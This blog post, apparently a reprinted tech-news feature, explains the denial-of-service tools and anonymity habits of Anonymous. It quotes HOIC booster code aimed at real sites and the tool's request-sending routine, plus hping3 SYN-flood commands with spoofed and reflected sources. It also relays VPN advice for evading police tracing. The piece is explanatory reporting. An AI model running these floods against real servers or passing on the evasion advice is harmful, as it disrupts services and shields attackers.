Sunday, 3 June 2012

High Orbits and Slowlorises: understanding the Anonymous attack tools



Anonymous' HOIC denial-of-service attack tool
Most members of Anonymous would prefer to stay, well, anonymous. But as the group has engaged in increasingly high-profile attacks on government and corporate websites, doing so effectively and staying out of harm's way have become an ever-growing challenge. To protect itself, the group has altered its tactics over the past year to both increase the firepower of its attacks and shield members from the prying eyes of law enforcement.
In late 2011, members of Anonymous began to step away from their most well-known weapon for distributed denial of service attacks. While some in the group continued to try to get enthusiastic followers (or unwary webpage visitors) to use a Web browser version of the Low Orbit Ion Cannon attack tool, use of LOIC had led to the arrests of members of Anonymous and LulzSec last summer. More cautious and technically skilled Anons started to use a collection of other tools and security practices to both step up attacks and hide themselves from being tracked. A message spread through Anonymous’ IRC channels spells it out: “Do NOT use LOIC.”

How Denial of Service attacks work

Denial-of-service (DoS) attacks are aimed at blocking access by outside users to a website or other Internet service. They usually do this by either overwhelming one or more of the resources of the server that hosts the website or application with traffic, or by disrupting a network service that the server depends on.
The most common of these are "flood" brute-force attacks that aim to overwhelm a server's network connections with a huge volume of requests, consuming the network bandwidth of the server's connection, or filling up the memory associated with the server application's network connections, rendering them unreachable. Other types of attacks are crafted to go after the applications themselves, and use specially formed network requests to a server to exploit a function of its software to crash it or make it stop responding.
A distributed denial of service (DDoS) attack spreads the malicious requests to the server across many source computers—often by using a "botnet" controlling hundreds of infected computers, or in the case of Anonymous, by coordinating the efforts of tens or hundreds of volunteer "activists" to launch attacks.
The attacks on the websites of the Justice Department and others in the wake of the takedown of Megaupload.com were the first demonstration of the power of LOIC’s successor—a DDoS tool called the High Orbit Ion Cannon.
HOIC isn't exactly rocket science. At its core, it is essentially a simple script for launching HTTP POST and GET requests at a targeted server, wrapped in a "lulz" friendly graphical interface. According to the documentation, it can be used to open up 256 attack sessions simultaneously—either targeting a single server, or going after multiple targets. The user can control the number of threads used per attack.

 

This rocket needs boosters

The code itself isn't that sophisticated. HOIC is written in Basic—or, to be more accurate, Real Software's Real Basic, the cross-platform version of the language originally developed for the Mac. The main power of HOIC is that it can be customized for each attack target relatively easily without having to know how to code, using "boosters," modules with additional bits of Basic code that are interpreted at runtime.
HOIC’s boosters are used to tailor the HTTP requests sent by HOIC to the target for a specific type of attack. ”HOIC is pretty useless,” the documentation file that comes with the code says, “unless it is used in combination with ‘Boosters.’” And that's putting it mildly—the attack code is generated based completely on what's in the booster file. When an attack is launched, HOIC compiles the booster to create the HTTP headers to be sent, and sets the mode of the attack.
One approach commonly used in boosters is to create randomized requests in an attempt to defeat any content delivery network (CDN) or caching used to shield the server from traffic spikes. Some boosters use lists of URLs within a target site, appending them to a table in memory to be used by the attack thread:
// populate rotating urls
randURLs.Append "http://www.om.nl/"
randURLs.Append "http://www.om.nl/onderwerpen/cybercrime/"
The script also can include a randomized list of user agents, referring sites and random headers that are fed into HTTP requests to make the requests look more legitimate:
useragents.Append " Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6"
useragents.Append " Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
referers.Append " http://www.google.com/?q=" +URL
The booster script can also include parameters to set the volume of the attack, and to switch between GET and POST requests. For example, here’s the booster set up to attack a dynamic part of Visa’s webpage, using POST, complete with a form submission to the target page:
UsePost = true
Headers.Append(" User-Agent: Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.12) Gecko/20101027 Firefox/3.6.12" )
Headers.Append(" Keep-Alive: 115")
Headers.Append("Proxy-Connection: keep-alive")

Headers.Append(" Referer: http://visa.via.infonow.net/locator/global/AdvancedSearchAction.do")

Headers.Append(" Cookie: JSESSIONID=5D2E604F487FB5AC9DBF9A1FDEA7D86A.fta-web3" )

URL = "http://visa.via.infonow.net/locator/global/AdvancedSearchAction.do"

PostBuffer = "newSearch=true&airport=&pageid=adv&filteredNameSubmit=false&LOC=en_US&country=CHE&street1=2353464756867867876886786777777777777777777777777777786&building=&city=aaaaaaaaaaaaaaa&initialSearchName=&mapAndList=mapAndList&x=27&y=9"
While the scripts themselves can get fairly sophisticated in how they’re configured, a generic booster file distributed with HOIC makes it fairly simple for would-be DDoSers to build a custom booster for their target of ire of the moment and distribute it via a shared document site like PasteBin, Google Documents, or an Etherpad site. For example, when a hungry Anon got upset about a late pizza delivery on Valentine’s Day, he quickly shared a clip of Web addresses to start an impromptu DDoS on Pizza Hut.
The actual code that runs the attacks is executed as threads by a set of timers. ObjTarget.SendAttack is pretty straightforward:
'Creating the socket request
  Dim httpObj as HTTPSocket
  Dim i as integer
  Dim reqSize as integer = 0
  httpObj = New HTTPSocket

  ' Adding the headers generated by the booster
  for i = 0 to Headers.Ubound
    reqSize = reqSize + Headers(i).Len
    httpObj.SetRequestHeader(Headers(i).Left(Headers(i).InStr(":")-1), Headers(i).Mid(Headers(i).InStr(":")+1, Headers(i).Len - Headers(i).InStr(":")))
  Next

'For attacks wher POST has been chosen as the type of HTTP request
  if(UsePost) then
    reqSize = reqSize + PostBuffer.Len + 4 ' POST
    httpObj.SetPostContent(PostBuffer, "application/x-www-form-urlencoded")
    httpobj.Post URL
'For GET based attacks
  else
    reqSize = reqSize + 3 ' GET
    httpobj.Get URL
  end if

 'Tracking how much data has been sent to the target
  TotalBytesSent = TotalBytesSent + reqSize
But HOIC isn’t the only tool that Anons are promoting.

The old(er) bag of tricks

Despite its improved attacks, HOIC still points an arrow straight back at the source of the DDoS. And some of the targets Anonymous’ various #Ops are going after aren’t suitable for straight-up HTTP attacks. So there are two other tools that have been tossed into Anon’s #Setup recommendations that aren’t exactly new to the security world: Hping and Slowloris, a pair of network security testing tools that also have the potential to be used for evil.
Hping is a TCP/IP "packet assembler and analyzer" initially developed and now maintained by Salvatore Sanfillipo, a Sicilian programmer. It uses a command-line interface similar to that of the ping network utility, but it can do a lot more than make ICMP echo requests. It can be used to throw high volumes of TCP requests at a target, while masking the source of the attack through spoofing, as Anonymous’ tutorial shows:
 ### Normal hping DoS attack:
hping3 -S -i u100 riaa.org
### Spoofed random source address attack:
hping3 -S -i u100 riaa.org --rand-source
### Reflected attack(it looks like mpaa.org is DoS'ing riaa.org)
hping3 -S -i u100 riaa.org -a mpaa.org
Slowloris is a different sort of attack entirely—a slow HTTP attack that uses partial HTTP requests to a server, making it wait for more chunks of the request and slowly spooning them out to keep the IP socket on the server open. This type of attack works best against low-traffic sites on Apache and a variety of other Web servers by eating up available network ports on the server. It’s ideal for attacks on servers in places where there’s a concern about there being enough bandwidth for a brute-force DDoS to succeed, or where there’s concern about the collateral damage to other users on the same network. That’s why Slowloris was used against Iranian servers during the protests around the Iranian elections in 2009.
But Slowloris is not a tool for the masses. It requires Perl, and runs best on Linux. The author of Slowloris, known as RSnake, said that Windows users “will not be able to successfully execute a Slowloris denial of service from Windows…because Slowloris requires more than a few hundred sockets to work (sometimes a thousand or more), and Windows limits sockets to around 130, from what I've seen.”
However, a Python-based version of the exploit, PyLoris, gets around those limitations. It has a graphical interface, and can be used effectively from Windows; Christopher Gilbert, the developer of PyLoris, claims he’s tested PyLoris on Windows with "over 6000 connections, and [doesn’t] see why it couldn’t use more than that."
PyLoris also includes a feature called TOR Switcher, which allows attacks to be carried out over the anonymized Tor Network and switch between Tor "identities," changing the apparent location the attack is coming from at user-defined intervals.

A screenshot of PyLoris in action
A screenshot of PyLoris in action
Used individually, these tools can be somewhat effective in slowing down many of the sites that Anonymous targets. But as Curt Wilson, a researcher with Arbor Networks’ Security Engineering and Response Team, said to Ars in an interview, "If you use volumetric floods on top of specific application attacks [like Slowloris], it’s a pretty powerful combination."
And just by the sheer number of attacking systems that Anonymous can bring aboard to launch these attacks when its members and friends are highly motivated—as in the wake of the Megaupload shutdown—even the most basic of tools can cause problems for large websites.

Covering the trail

There is still the matter of being able to pull off these large attacks with volunteered computers and keeping those volunteers anonymous. While Hping can provide some obscuring of the source of an attack, the other tools point straight back at their source. So Anons have been eager to find ways to keep their IP addresses concealed.
The problem is that freely available anonymizing networks generally aren’t up to the task of handling the bandwidth of DOS attacks. Attempting to launch HOIC or other DDoS tools over Tor would amount to an attack on that network itself—and on the Anonymous members who use it to protect themselves. So with the exception of Slowloris and PyLoris attacks, which demand relatively little bandwidth, the Anonymous edict is “DO NOT DOS THROUGH TOR.”
Some Anons have turned to a variety of proxy tools—including a fairly suspicious commercial software package called AutoHideIP, which claims to anonymize users by connecting them through proxies for a one-time fee, even selecting the country from which their IP address appears to be located. Efforts by Ars to contact the creators of AutoHideIP, Coolware Max, were unsuccessful.
But there’s reason to be suspicious of the security of proxy services, and of other anonymizing services such as VPNs, because they could be compelled by law enforcement to turn over traffic logs. That was the case in the arrest of one alleged LulzSec member, who was apprehended after VPN provider HideMyAss.com turned over log data that helped trace him to Arizona.
For that reason, Anonymous’ best-practice advice for members is to stick to Anonine and VPNTunnel, two paid VPN-based anonymizing services based in Sweden—where privacy laws don’t require providers to keep access logs (and in some cases prohibit it).
Both of the services are based on OpenVPN, a GPL-based open source virtual private network technology available on Windows, MacOS and Linux. However, as Anonine has expanded service beyond Sweden, with servers available worldwide, some of its servers have started to keep logs in accordance with local laws—so Anonymous’ members are warned to specifically configure their clients for Swedish servers.
It's doubtful that everyone in Anonymous plays by these rules. And that's probably a good thing for Anonymous, because it would pose a strategic problem—all that authorities would need to do to deflect Anonymous' attacks is to refuse connections from the blocks of IP addresses assigned to these two Swedish providers. And with the European Union considering new EU-wide regulations that would standardize privacy rules across the continent, it's not certain how much longer Sweden will be a safe haven.

0 comments:

Post a Comment

Related Posts Plugin for WordPress, Blogger...